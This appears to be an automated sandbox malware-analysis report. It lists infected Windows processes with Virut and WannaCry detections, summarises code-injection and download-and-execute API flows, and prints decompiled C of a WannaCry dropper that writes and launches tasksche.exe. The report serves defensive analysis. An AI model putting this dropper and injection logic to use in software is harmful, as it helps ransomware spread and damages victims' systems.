                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:22
                                                                                                                                              Start time:01:44:35
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000000.300112892.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000000.304308861.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000000.304252619.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000002.780935502.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000002.780728643.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              Target ID:23
                                                                                                                                              Start time:01:44:35
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                              Imagebase:0x7ff78e9b0000
                                                                                                                                              File size:163336 bytes
                                                                                                                                              MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:24
                                                                                                                                              Start time:01:44:36
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:25
                                                                                                                                              Start time:01:44:37
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:fontdrvhost.exe
                                                                                                                                              Imagebase:0x7ff7d9820000
                                                                                                                                              File size:790304 bytes
MD5 hash: 31113981180E69C2773BCADA4051738A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000002.780744120.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000000.306044104.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000000.305864286.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000002.780921398.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000000.302993450.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

Target ID: 26
Start time: 01:44:38
Start date: 23/07/2022
Path: C:\Windows\System32\dwm.exe
Wow64 process (32bit): false
Commandline: dwm.exe
Imagebase: 0x7ff729570000
File size: 62464 bytes
MD5 hash: 70073A05B2B43FFB7A625708BB29E7C7
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000000.305699245.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000002.780744420.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000000.308100233.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000000.308123109.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000002.780927237.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

Target ID: 27
Start time: 01:44:40
Start date: 23/07/2022
Path: C:\Windows\System32\backgroundTaskHost.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
Imagebase: 0x7ff638ba0000
File size: 19352 bytes
MD5 hash: B7FC4A29431D4F795BBAB1FB182B759A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language

Target ID: 28
Start time: 01:44:44
Start date: 23/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff73c930000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 29
Start time: 01:44:46
Start date: 23/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff73c930000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 30
Start time: 01:44:52
Start date: 23/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff73c930000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 31
Start time: 01:44:55
Start date: 23/07/2022
Path: C:\Windows\tasksche.exe
Wow64 process (32bit): false
Commandline: C:\WINDOWS\tasksche.exe /i
Imagebase: 0x400000
File size: 3514368 bytes
MD5 hash: 3233ACED9279EF54267C479BBA665B90
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp, Author: us-cert code analysis team
• Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000001F.00000000.342404801.000000000040E000.00000008.00000001.01000000.00000007.sdmp, Author: us-cert code analysis team
• Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
• Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
• Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 85%, Metadefender
• Detection: 95%, ReversingLabs

Target ID: 32
Start time: 01:44:59
Start date: 23/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase: 0x7ff73c930000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000020.00000000.351839583.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000020.00000002.780747670.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

Target ID: 33
Start time: 01:45:01
Start date: 23/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
Imagebase: 0x7ff73c930000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000021.00000000.354298451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000021.00000002.780747070.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

Target ID: 34
Start time: 01:45:05
Start date: 23/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts
Imagebase: 0x7ff73c930000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000022.00000002.780744908.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000022.00000000.364362533.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

Target ID: 35
Start time: 01:45:08
Start date: 23/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase: 0x7ff73c930000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000002.780747324.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000000.370652904.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

Target ID: 36
Start time: 01:45:12
Start date: 23/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase: 0x7ff73c930000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000024.00000002.780745901.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000024.00000000.379109291.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

Target ID: 37
Start time: 01:45:14
Start date: 23/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc
Imagebase: 0x7ff73c930000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000002.780746234.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000000.382043124.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              Target ID:38
                                                                                                                                              Start time:01:45:15
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000000.385443312.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000002.780755770.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              Target ID:39
                                                                                                                                              Start time:01:45:17
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000027.00000002.780822412.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000027.00000000.388511778.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              Target ID:40
                                                                                                                                              Start time:01:45:24
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservice -p -s EventSystem
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000028.00000002.780830688.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000028.00000000.404533408.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security


                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:4.1%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:62.2%
                                                                                                                                                Total number of Nodes:699
                                                                                                                                                Total number of Limit Nodes:11
                                                                                                                                                 execution_graph: [node/edge data of the interactive execution graph viewer; not reproduced as text. The graph covers, among others, the file-mapping sequence (GetFileAttributesA, SetFileAttributesA, CreateFileA, CreateFileMappingA, MapViewOfFile), privilege adjustment (LookupPrivilegeValueA, NtAdjustPrivilegesToken), section-based code injection (NtOpenSection, NtMapViewOfSection, NtCreateSection, NtProtectVirtualMemory, NtWriteVirtualMemory, CreateRemoteThread), process enumeration (CreateToolhelp32Snapshot, Process32First, Process32Next, OpenProcess, NtOpenProcessToken), dynamic API resolution (LoadLibraryA, GetModuleHandleA, GetProcAddress), host fingerprinting (GetVolumeInformationA, GetVersionExA, GetTickCount, GetModuleFileNameA), the network loop (WSAStartup, gethostbyname, socket, connect, closesocket, CreateEventA, SetEvent, ResetEvent, Sleep, RtlExitUserThread) and the download-and-execute path (GetTempPathA, GetTempFileNameA, InternetReadFile, WriteFile, CreateProcessA, InternetCloseHandle).]
6472->6473 6473->6472 6474 7fea115c 6473->6474 6475 7fea1133 GetModuleHandleA GetProcAddress 6473->6475 6474->6437 6475->6473 6477 7fea05c9 6476->6477 6478 7fea05bf Sleep 6476->6478 6477->6443 6478->6476 6480 7fea10ce 2 API calls 6479->6480 6481 7fea060e 6480->6481 6482 7fea05a9 CloseHandle 6481->6482 6483 7fea06fc lstrcpyW 6481->6483 6485 7fea074c NtMapViewOfSection 6481->6485 6486 7fea0717 GetPEB lstrcpyW lstrcatW 6481->6486 6488 7fea0780 NtOpenProcessToken 6481->6488 6489 7fea07c5 CreateToolhelp32Snapshot Process32First 6481->6489 6490 7fea07eb Process32Next 6481->6490 6491 7fea2574 5 API calls 6481->6491 6492 7fea07ac 30 API calls 6481->6492 6494 7fea07fd OpenProcess 6481->6494 6495 7fea085c CloseHandle 6481->6495 6496 7fea0834 CreateRemoteThread 6481->6496 6497 7fea05ba Sleep 6481->6497 6482->6479 6484 7fea24ae 3 API calls 6483->6484 6484->6481 6485->6481 6485->6482 6487 7fea24ae 3 API calls 6486->6487 6487->6481 6488->6481 6488->6489 6489->6481 6490->6481 6493 7fea0865 CloseHandle 6490->6493 6491->6481 6492->6481 6493->6482 6494->6481 6494->6490 6495->6490 6496->6481 6496->6495 6497->6495 6499 7fea24ea NtCreateSection 6498->6499 6499->6464 6522 7fea144a LookupPrivilegeValueA NtAdjustPrivilegesToken 6500->6522 6502 7fea07b2 FreeLibrary CloseHandle 6503 7fea07c5 CreateToolhelp32Snapshot Process32First 6502->6503 6515 7fea060e 6503->6515 6504 7fea07eb Process32Next 6506 7fea0865 CloseHandle 6504->6506 6504->6515 6505 7fea2574 5 API calls 6505->6515 6507 7fea05a9 CloseHandle 6506->6507 6511 7fea05f2 GetModuleHandleA 6507->6511 6508 7fea07fd OpenProcess 6508->6504 6508->6515 6509 7fea085c CloseHandle 6509->6504 6510 7fea0834 CreateRemoteThread 6510->6509 6510->6515 6512 7fea10ce 2 API calls 6511->6512 6512->6515 6513 7fea05ba Sleep 6513->6509 6514 7fea06fc lstrcpyW 6516 7fea24ae 3 API calls 6514->6516 6515->6503 6515->6504 6515->6505 6515->6507 6515->6508 6515->6509 6515->6510 6515->6513 6515->6514 6517 7fea074c NtMapViewOfSection 6515->6517 6518 7fea0717 GetPEB 
lstrcpyW lstrcatW 6515->6518 6520 7fea0780 NtOpenProcessToken 6515->6520 6521 7fea07ac 13 API calls 6515->6521 6516->6515 6517->6507 6517->6515 6519 7fea24ae 3 API calls 6518->6519 6519->6515 6520->6503 6520->6515 6521->6515 6522->6502 6368 409a16 __set_app_type __p__fmode __p__commode 6369 409a85 6368->6369 6370 409a99 6369->6370 6371 409a8d __setusermatherr 6369->6371 6380 409b8c _controlfp 6370->6380 6371->6370 6373 409a9e _initterm __getmainargs _initterm 6375 409af2 GetStartupInfoA 6373->6375 6376 409b26 GetModuleHandleA 6375->6376 6381 408140 InternetOpenA InternetOpenUrlA InternetCloseHandle InternetCloseHandle 6376->6381 6380->6373 6384 408090 GetModuleFileNameA __p___argc 6381->6384 6383 4081b2 exit _XcptFilter 6385 4080b0 6384->6385 6386 4080b9 OpenSCManagerA 6384->6386 6395 407f20 6385->6395 6387 408101 StartServiceCtrlDispatcherA 6386->6387 6388 4080cf OpenServiceA 6386->6388 6387->6383 6390 4080fc CloseServiceHandle 6388->6390 6391 4080ee 6388->6391 6390->6387 6400 407fa0 ChangeServiceConfig2A 6391->6400 6394 4080f6 CloseServiceHandle 6394->6390 6412 407c40 sprintf OpenSCManagerA 6395->6412 6397 407f25 6401 407ce0 GetModuleHandleW 6397->6401 6400->6394 6402 407d01 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 6401->6402 6403 407f08 6401->6403 6402->6403 6404 407d49 6402->6404 6403->6383 6404->6403 6405 407d69 FindResourceA 6404->6405 6405->6403 6406 407d84 LoadResource 6405->6406 6406->6403 6407 407d94 LockResource 6406->6407 6407->6403 6408 407da7 SizeofResource 6407->6408 6408->6403 6409 407db9 sprintf sprintf MoveFileExA CreateFileA 6408->6409 6409->6403 6410 407e54 WriteFile CloseHandle CreateProcessA 6409->6410 6410->6403 6411 407ef2 CloseHandle CloseHandle 6410->6411 6411->6403 6413 407c74 CreateServiceA 6412->6413 6414 407cca 6412->6414 6415 407cbb CloseServiceHandle 6413->6415 6416 407cad StartServiceA CloseServiceHandle 6413->6416 6414->6397 6415->6397 6416->6415 7124 ac443b 7127 ac144a LookupPrivilegeValueA 
NtAdjustPrivilegesToken 7124->7127 7126 ac4441 7127->7126 6523 ac3888 6525 ac388e GetSystemTime 6523->6525 6526 ac38d2 6525->6526 6527 ac390c Sleep 6526->6527 6528 ac3924 InternetGetConnectedState 6526->6528 6529 ac3a32 6526->6529 6530 ac3954 gethostbyname 6526->6530 6533 ac3a1f closesocket 6526->6533 6527->6526 6528->6526 6530->6526 6531 ac397a socket 6530->6531 6531->6526 6532 ac3990 ioctlsocket connect Sleep 6531->6532 6532->6526 6533->6526 7128 ac0000 7129 ac0004 7128->7129 7130 ac00a1 7129->7130 7131 ac025e GetPEB 7129->7131 7131->7130 6534 ac3399 6536 ac33a2 6534->6536 6537 ac33a9 Sleep 6536->6537 6537->6537 7132 ac3819 7134 ac381f WaitForSingleObject 7132->7134 7135 ac383b closesocket 7134->7135 7136 ac3845 7134->7136 7135->7136 6699 ac0fd6 6701 ac10a0 6699->6701 6700 ac115c 6701->6700 6702 ac1133 GetModuleHandleA GetProcAddress 6701->6702 6702->6701 6703 7fea1196 GetProcAddress

Control-flow Graph

C-Code - Quality: 86%
E00407CE0() {
	void _v259;
	char _v260;
	void _v519;
	char _v520;
	struct _STARTUPINFOA _v588;
	struct _PROCESS_INFORMATION _v604;
	long _v608;
	_Unknown_base(*)()* _t36;
	void* _t38;
	void* _t39;
	void* _t50;
	int _t59;
	struct HINSTANCE__* _t104;
	struct HRSRC__* _t105;
	void* _t107;
	void* _t108;
	long _t109;
	intOrPtr _t121;
	intOrPtr _t122;

	_t104 = GetModuleHandleW(L"kernel32.dll");
	if(_t104 != 0) {
		 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
		 *0x431458 = GetProcAddress(_t104, "CreateFileA");
		 *0x431460 = GetProcAddress(_t104, "WriteFile");
		_t36 = GetProcAddress(_t104, "CloseHandle");
		 *0x43144c = _t36;
		if( *0x431478 != 0) {
			_t121 =  *0x431458; // 0x7620f7b0
			if(_t121 != 0) {
				_t122 =  *0x431460; // 0x7620fc30
				if(_t122 != 0 && _t36 != 0) {
					_t105 = FindResourceA(0, 0x727, "R");
					if(_t105 != 0) {
						_t38 = LoadResource(0, _t105);
						if(_t38 != 0) {
							_t39 = LockResource(_t38);
							_v608 = _t39;
							if(_t39 != 0) {
								_t109 = SizeofResource(0, _t105);
								if(_t109 != 0) {
									_v520 = 0;
									memset( &_v519, 0, 0x40 << 2);
									asm("stosw");
									asm("stosb");
									_v260 = 0;
									memset( &_v259, 0, 0x40 << 2);
									asm("stosw");
									asm("stosb");
									sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
									sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
									MoveFileExA( &_v520,  &_v260, 1); // executed
									_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
									_t107 = _t50;
									if(_t107 != 0xffffffff) {
										WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
										CloseHandle(_t107);
										_v604.hThread = 0;
										_v604.dwProcessId = 0;
										_v604.dwThreadId = 0;
										memset( &(_v588.lpReserved), 0, 0x10 << 2);
										asm("repne scasb");
										_v604.hProcess = 0;
										_t108 = " /i";
										asm("repne scasb");
										memcpy( &_v520 - 1, _t108, 0 << 2);
										memcpy(_t108 + 0x175b75a, _t108, 0);
										_v588.cb = 0x44;
										_v588.wShowWindow = 0;
										_v588.dwFlags = 0x81;
										_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
										if(_t59 != 0) {
											CloseHandle(_v604.hThread);
											CloseHandle(_v604);
										}
									}
								}
							}
						}
					}
				}
			}
		}
	}
	return 0;
}
                                                                                                                                                0x00407d4f
                                                                                                                                                0x00407d43
                                                                                                                                                0x00407f14

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F61FB10,?,00000000), ref: 00407CEF
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                                                                                                                                                • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                                                                                                                                                • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                                                                                                                                                • sprintf.MSVCRT ref: 00407E01
                                                                                                                                                • sprintf.MSVCRT ref: 00407E18
                                                                                                                                                • MoveFileExA.KERNEL32 ref: 00407E2C
                                                                                                                                                • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
                                                                                                                                                • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00407E68
                                                                                                                                                • CreateProcessA.KERNELBASE ref: 00407EE8
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00407EF7
                                                                                                                                                • CloseHandle.KERNEL32(08000000), ref: 00407F02
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.499030707.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.499000927.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                • Associated: 00000004.00000002.499068443.0000000000409000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                • Associated: 00000004.00000002.499102818.000000000040A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                • Associated: 00000004.00000002.499128705.000000000040B000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                • Associated: 00000004.00000002.499145703.000000000040F000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                • Associated: 00000004.00000002.499190020.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                • Associated: 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp
                                                                                                                                                • Associated: 00000004.00000002.501302167.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleProcResource$CloseFile$Createsprintf$FindLoadLockModuleMoveProcessSizeofWrite
                                                                                                                                                • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                                                                                                                                                • API String ID: 4281112323-1507730452
                                                                                                                                                • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                                                                                                                • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                                                                                                                                                • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                                                                                                                • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
